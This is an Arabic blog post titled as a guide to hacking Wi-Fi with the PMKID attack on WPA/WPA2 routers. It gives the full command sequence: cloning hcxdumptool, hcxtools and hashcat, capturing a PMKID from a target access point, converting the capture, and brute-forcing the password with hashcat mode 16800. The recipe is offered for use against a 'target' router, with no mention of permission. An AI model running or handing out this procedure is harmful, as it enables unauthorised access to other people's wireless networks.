إختراق الواي فاي باستخدام PMKID

هجوم جديد على WPA / WPA2 باستخدام PMKID : تم اكتشاف هذه التقنية الجديدة من قبل مطور يدعى Jens “atom” Steube إذ تمكن من استرداد معرف المفتاح الرئيسي (PMKID) بسهولة من موجه (راوتر) المستخدم سواء أكان يستخدم معايير أمان WPA أو WPA2.

يمكن استخدام هذه الطريقة للحصول على كلمة مرور WIFI الخاصة بجهاز توجيه الهذف, حتى لو كان يشتغل على أحدث تردد قياسي لـ IEEE. فالطرق الأقدم تتطلب التقاط مصافحة المصادقة الكاملة للحصول على كلمة المرور. لكن مع هذه  الطريقة الجديدة لا يتطلب الاستغلال سوى طلب واحد يمكن الحصول عليه بسهولة من نقطة الوصول(راوتر).

 تحميل الأدوات:


 الأوامر:

$ git clone https://github.com/ZerBea/hcxdumptool
$ git clone https://github.com/ZerBea/hcxtools
$ git clone  https://github.com/hashcat/hashcat

 1. تشغيل hcxdumptool لطلب PMKID من Access Point و تفريغ الإطار المستلم إلى ملف (بتنسيق pcapng).

$ ./hcxdumptool -o test.pcapng -i wlan1 --enable_status

عندما يستلم Access Point حزمة طلب الربط الخاصة بنا وتدعم إرسال PMKID سنرى رسالة "FOUND PMKID" بعد لحظة:

ملاحظة: بسبب وجود بعد التشويش على قناة ويفي ، قد يستغرق الأمر بعض الوقت لتلقي PMKID. لهذا نوصيك بتشغيل hcxdumptool لمدة تصل إلى 10 دقائق قبل إجهاضها.

2. تشغيل hcxpcaptool لتحويل البيانات التي تم التقاطها من تنسيق pcapng إلى تنسيق يتم قبوله من قِبَل hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

 ستحصل على محتوى الملف مكتوب كما يلي:

$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

 3. تشغيل hashcat للحصول على كلمة المرور.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

 شاهد الفيديو التطبيقي:

يُفضل العمل على توزيعة Arch Linux.

المصدر: https://hashcat.net/forum/thread-7717.html

 

 

شاركه على جوجل بلس

عن herradi

    تعليقات بلوجر
    تعليقات فيسبوك

0 التعليقات:

إرسال تعليق